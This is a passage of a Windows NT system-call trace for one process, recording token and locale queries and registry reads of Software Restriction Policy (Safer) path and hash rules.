 00956   748   NtOpenProcessToken  (-1, 0xa, ... 100, ) == 0x0
 00957   748   NtQueryInformationToken  (100, User, 136, ... {token info, class 1, size 36}, 36, ) == 0x0
 00958   748   NtOpenKey  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00959   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 104, ) }, ... 104, ) == 0x0
 00960   748   NtQueryValueKey  (104,  (104, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (104, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00961   748   NtQueryValueKey  (104,  (104, "AuthenticodeEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (104, "AuthenticodeEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00962   748   NtClose  (104, ... ) == 0x0
 00963   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\LevelObjects"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00964   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 104, ) }, ... 104, ) == 0x0
 00965   748   NtQueryValueKey  (104,  (104, "Levels", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00966   748   NtClose  (104, ... ) == 0x0
 00967   748   NtQueryDefaultUILanguage  (2090319928, ...
 00968   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00969   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482740, ) == 0x0
 00970   748   NtQueryInformationToken  (-2147482740, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00971   748   NtClose  (-2147482740, ... ) == 0x0
 00972   748   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 00973   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x240, 0, 0,  (0x80000000, {24, -2147482740, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00974   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x640, 0, 0,  (0x80000000, {24, -2147482740, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481328, ) }, ... -2147481328, ) == 0x0
 00975   748   NtQueryValueKey  (-2147481328,  (-2147481328, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00976   748   NtClose  (-2147481328, ... ) == 0x0
 00977   748   NtClose  (-2147482740, ... ) == 0x0
 00967   748   NtQueryDefaultUILanguage  ... ) == 0x0
 00978   748   NtQueryInstallUILanguage  (2090319930, ... ) == 0x0
 00979   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00980   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00981   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00982   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00983   748   NtAllocateVirtualMemory  (-1, 1372160, 0, 4096, 4096, 4, ... 1372160, 4096, ) == 0x0
 00984   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00985   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00986   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00987   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00988   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00989   748   NtQueryDefaultLocale  (1, 1231892, ... ) == 0x0
 00990   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"}, ... 104, ) }, ... 104, ) == 0x0
 00991   748   NtEnumerateKey  (104, 0, Basic, 280, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name= (104, 0, Basic, 280, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name="{dda3f824-d8cb-441b-834d-be2efd2c1a33}"}, 92, ) }, 92, ) == 0x0
 00992   748   NtOpenKey  (0x20019, {24, 104, 0x40, 0, 0,  (0x20019, {24, 104, 0x40, 0, 0, "{dda3f824-d8cb-441b-834d-be2efd2c1a33}"}, ... 108, ) }, ... 108, ) == 0x0
 00993   748   NtQueryValueKey  (108,  (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=2, Data="%\0H\0K\0E\0Y\0_\0C\0U\0R\0R\0E\0N\0T\0_\0U\0S\0E\0R\0\\0S\0o\0f\0t\0w\0a\0r\0e\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0W\0i\0n\0d\0o\0w\0s\0\\0C\0u\0r\0r\0e\0n\0t\0V\0e\0r\0s\0i\0o\0n\0\\0E\0x\0p\0l\0o\0r\0e\0r\0\\0S\0h\0e\0l\0l\0 \0F\0o\0l\0d\0e\0r\0s\0\\0C\0a\0c\0h\0e\0%\0O\0L\0K\0*\0\0\0"}, 202, ) , Partial, 280, ... TitleIdx=0, Type=2, Data= (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=2, Data="%\0H\0K\0E\0Y\0_\0C\0U\0R\0R\0E\0N\0T\0_\0U\0S\0E\0R\0\\0S\0o\0f\0t\0w\0a\0r\0e\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0W\0i\0n\0d\0o\0w\0s\0\\0C\0u\0r\0r\0e\0n\0t\0V\0e\0r\0s\0i\0o\0n\0\\0E\0x\0p\0l\0o\0r\0e\0r\0\\0S\0h\0e\0l\0l\0 \0F\0o\0l\0d\0e\0r\0s\0\\0C\0a\0c\0h\0e\0%\0O\0L\0K\0*\0\0\0"}, 202, ) }, 202, ) == 0x0
 00994   748   NtQueryValueKey  (108,  (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00995   748   NtClose  (108, ... ) == 0x0
 00996   748   NtEnumerateKey  (104, 1, Basic, 280, ... ) == STATUS_NO_MORE_ENTRIES
 00997   748   NtClose  (104, ... ) == 0x0
 00998   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes"}, ... 104, ) }, ... 104, ) == 0x0
 00999   748   NtEnumerateKey  (104, 0, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (104, 0, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{349d35ab-37b5-462f-9b89-edd5fbde1328}"}, 92, ) }, 92, ) == 0x0
 01000   748   NtOpenKey  (0x20019, {24, 104, 0x40, 0, 0,  (0x20019, {24, 104, 0x40, 0, 0, "{349d35ab-37b5-462f-9b89-edd5fbde1328}"}, ... 108, ) }, ... 108, ) == 0x0
 01001   748   NtQueryValueKey  (108,  (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="^\2530O\225zI\211j\0l\341\25@\25"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="^\2530O\225zI\211j\0l\341\25@\25"}, 28, ) }, 28, ) == 0x0
 01002   748   NtQueryValueKey  (108,  (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0
 01003   748   NtQueryValueKey  (108,  (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\13\3\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\13\3\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01004   748   NtQueryValueKey  (108,  (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01005   748   NtClose  (108, ... ) == 0x0
 01006   748   NtEnumerateKey  (104, 1, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (104, 1, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}"}, 92, ) }, 92, ) == 0x0
 01007   748   NtOpenKey  (0x20019, {24, 104, 0x40, 0, 0,  (0x20019, {24, 104, 0x40, 0, 0, "{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}"}, ... 108, ) }, ... 108, ) == 0x0
 01008   748   NtQueryValueKey  (108,  (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="g\260\324\2134:?\323\274\351\334dg\4\363\224"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="g\260\324\2134:?\323\274\351\334dg\4\363\224"}, 28, ) }, 28, ) == 0x0
 01009   748   NtQueryValueKey  (108,  (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0
 01010   748   NtQueryValueKey  (108,  (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\5\2\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\5\2\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01011   748   NtQueryValueKey  (108,  (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01012   748   NtClose  (108, ... ) == 0x0
 01013   748   NtEnumerateKey  (104, 2, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (104, 2, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}"}, 92, ) }, 92, ) == 0x0
 01014   748   NtOpenKey  (0x20019, {24, 104, 0x40, 0, 0,  (0x20019, {24, 104, 0x40, 0, 0, "{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}"}, ... 108, ) }, ... 108, ) == 0x0
 01015   748   NtQueryValueKey  (108,  (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="2x\2\334\376\370\310\223\334\212\260\6\335\204}\35"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="2x\2\334\376\370\310\223\334\212\260\6\335\204}\35"}, 28, ) }, 28, ) == 0x0
 01016   748   NtQueryValueKey  (108,  (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0
 01017   748   NtQueryValueKey  (108,  (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\226\3\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\226\3\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01018   748   NtQueryValueKey  (108,  (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01019   748   NtClose  (108, ... ) == 0x0
 01020   748   NtEnumerateKey  (104, 3, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (104, 3, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{94e3e076-8f53-42a5-8411-085bcc18a68d}"}, 92, ) }, 92, ) == 0x0
 01021   748   NtOpenKey  (0x20019, {24, 104, 0x40, 0, 0,  (0x20019, {24, 104, 0x40, 0, 0, "{94e3e076-8f53-42a5-8411-085bcc18a68d}"}, ... 108, ) }, ... 108, ) == 0x0
 01022   748   NtQueryValueKey  (108,  (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="\275\232*\333B\353\330V\16%\16M\370\26/g"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="\275\232*\333B\353\330V\16%\16M\370\26/g"}, 28, ) }, 28, ) == 0x0
 01023   748   NtQueryValueKey  (108,  (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0
 01024   748   NtQueryValueKey  (108,  (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\345\0\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\345\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01025   748   NtQueryValueKey  (108,  (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01026   748   NtClose  (108, ... ) == 0x0
 01027   748   NtEnumerateKey  (104, 4, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (104, 4, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}"}, 92, ) }, 92, ) == 0x0
 01028   748   NtOpenKey  (0x20019, {24, 104, 0x40, 0, 0,  (0x20019, {24, 104, 0x40, 0, 0, "{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}"}, ... 108, ) }, ... 108, ) == 0x0
 01029   748   NtQueryValueKey  (108,  (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="8k\10_\204\354\366i\323k\225j"\300\36\200"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (108, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="8k\10_\204\354\366i\323k\225j"\300\36\200"}, 28, ) \300\36\200"}, 28, ) == 0x0
 01030   748   NtQueryValueKey  (108,  (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0
 01031   748   NtQueryValueKey  (108,  (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="r\1\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (108, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="r\1\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01032   748   NtQueryValueKey  (108,  (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (108, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01033   748   NtClose  (108, ... ) == 0x0
 01034   748   NtEnumerateKey  (104, 5, Basic, 280, ... ) == STATUS_NO_MORE_ENTRIES
 01035   748   NtClose  (104, ... ) == 0x0
 01036   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01037   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01038   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01039   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01040   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01041   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01042   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01043   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01044   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01045   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01046   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01047   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01048   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01049   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01050   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01051   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01052   748   NtClose  (104, ... ) == 0x0
 01053   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01054   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01055   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01056   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01057   748   NtClose  (104, ... ) == 0x0
 01058   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01059   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01060   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01061   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01062   748   NtClose  (104, ... ) == 0x0
 01063   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01064   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01065   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01066   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01067   748   NtClose  (104, ... ) == 0x0
 01068   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01069   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01070   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01071   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01072   748   NtClose  (104, ... ) == 0x0
 01073   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01074   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01075   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01076   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01077   748   NtClose  (104, ... ) == 0x0
 01078   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01079   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01080   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01081   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01082   748   NtClose  (104, ... ) == 0x0
 01083   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01084   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01085   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01086   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01087   748   NtClose  (104, ... ) == 0x0
 01088   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01089   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01090   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01091   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01092   748   NtClose  (104, ... ) == 0x0
 01093   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01094   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01095   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01096   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01097   748   NtClose  (104, ... ) == 0x0
 01098   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01099   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01100   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01101   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01102   748   NtClose  (104, ... ) == 0x0
 01103   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01104   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01105   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01106   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01107   748   NtClose  (104, ... ) == 0x0
